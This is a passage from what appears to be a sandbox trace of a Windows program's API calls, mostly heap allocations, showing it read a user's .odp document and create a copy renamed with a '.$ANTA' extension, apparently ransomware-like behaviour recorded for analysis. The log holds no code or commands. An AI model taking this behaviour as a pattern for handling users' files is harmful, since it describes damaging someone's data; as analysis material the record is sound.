lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0082.099] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0082.099] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0082.099] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0082.099] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0082.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0082.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\rar_tjixyd14cwjz.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0082.100] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.100] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.100] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0082.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0082.101] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0082.101] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a84d8 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a84d8 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0082.103] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0082.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0082.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.103] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\rar_tjixyd14cwjz.odp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.104] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0082.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0082.105] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0082.105] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0082.105] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0082.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0082.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0082.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0a020 [0082.109] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0082.109] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0xadba, lpOverlapped=0x0) returned 1 [0082.119] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0082.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0082.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0082.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xadba) returned 0x499a008 [0082.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0a020 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xadba) returned 0x49a4dd0 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: 